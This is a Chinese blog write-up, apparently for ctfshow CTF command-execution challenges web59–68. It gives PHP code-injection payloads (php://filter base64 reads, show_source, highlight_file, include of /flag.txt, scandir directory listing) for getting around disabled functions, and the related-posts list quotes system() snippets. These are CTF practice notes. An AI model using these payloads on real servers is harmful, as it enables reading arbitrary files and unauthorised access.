ctfshow学习记录-web入门(命令执行59-68)

已于 2022-08-11 11:51:01 修改
阅读量330 收藏
点赞数 1
分类专栏: ctf-web # ctfshow-web 文章标签: 学习 web安全
于 2022-06-13 16:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48780534/article/details/125095507
版权

目录

web59-65

解答:payload和web58一样。
payload1:c=include "php://filter/read=convert.base64-encode/resource=flag.php";

payload2:c=show_source('flag.php');

payload3:?c=file_get_contents('flag.php');

web66

解答:show_source也被阻了,base64可以,不过flag没在flag.php里。
在这里插入图片描述

#查找flag的位置,打印目录:print_r(scandir("/"));
c=highlight_file('/flag.txt');
#或者
c=include "php://filter/read=convert.base64-encode/resource=/flag.txt";

web67

题目:题目显示的代码同web59

解答:​print_r被过滤了。
c=var_dump(scandir("/"));打印目录,然后用include或者高亮显示flag。

web68

题目:题目显示的代码同web59

解答:高亮highlight_file被过滤。

c=var_dump(scandir("/"));打印目录
c=include("/flag.txt");

或者用伪协议base64一下依旧可以。

九枕
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 命令执行 web68
Kradress的博客
12-04 325
目录源码思路题解总结 源码 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19 思路 根据提示,源码中可能存在highlight_file()函数,然后在php.ini中禁用了highlight_file().源码应该还是上题的. include和require能执行文件中的代码,因为flag不是php代码,所以只能以文本的形式显示 题解 发现
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFshow 命令执行 web59
Kradress的博客
12-03 206
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
ctfshow命令执行 web入门 web64-68
m0_62207170的博客
04-08 203
ctfshow命令执行 web入门 web64-68
ctfshow web入门 命令执行web59-63
m0_62207170的博客
04-07 148
ctfshow web入门命令执行web59-63
CTFshow web66 67 68 69 70 71
ChenD的学习笔记
11-13 826
CTFshow web66 web67 web68 web69 web70 web71
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow--web--命令执行
whisper921的博客
02-11 3133
web29 可以看到过滤了flag字样 但我们可以通过通配符绕过flag,比如用fla?来表示flag 先用?c=system('ls');来观察该目录下存在的文件,发现了flag.php 然后使用?c=system('cp fla?.php 1.txt');将flag.php的内容配对到1.txt中 然后访问1.txt即可得到flag 得到flag web30 发现新过滤了system以及php这两个关键字 我们此时可以通过反引号```来代替system,继...
CTFshow web56 57 58 59 60-65
ChenD的学习笔记
11-12 895
CTFshow web56 web57 web58 web59 web60 web61 web62 web63 web64 web65
ctfshow-web命令执行(web61-77;118-124)(Updating)
m0_50268414的博客
11-30 2700
ctfshow-web命令执行(web61-77;118-124) 文章目录ctfshow-web命令执行(web61-77;118-124)web66 print\_r(scandir())与highlight\_file()web68 includeweb69 exit() web66 print_r(scandir())与highlight_file() 题目描述 show_source('flag.php'); 该语句被过滤 题解 POST传入c=print_r(scandir(’/’)); 获得
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 583
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
ctfshow web入门命令执行
uuzfumo的博客
12-17 1063
命令执行姿势
CTFshow web(php命令执行 68-71)
csjjjd的博客
02-13 1221
直接输出根目录的位置,然后查看源代码,发现flag位置为flag.txt。还是那句话,没看到flag在哪,那就优先找到flag位置。知道flag在根目录下面的flag.txt直接访问就好了。这里c=var_dump(scandir("/"));先把上题payload看看能不能白嫖啊。// 你们在炫技吗?
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3001
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
ctfshow——web入门 SSRF
m0_74093152的博客
06-04 710
通过hackbar post提交获得flag。
CTFShow-WEB入门--信息搜集详细Wp
Aluxian_的博客
06-02 2156
CTFShow-WEB入门--信息搜集详细Wp
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值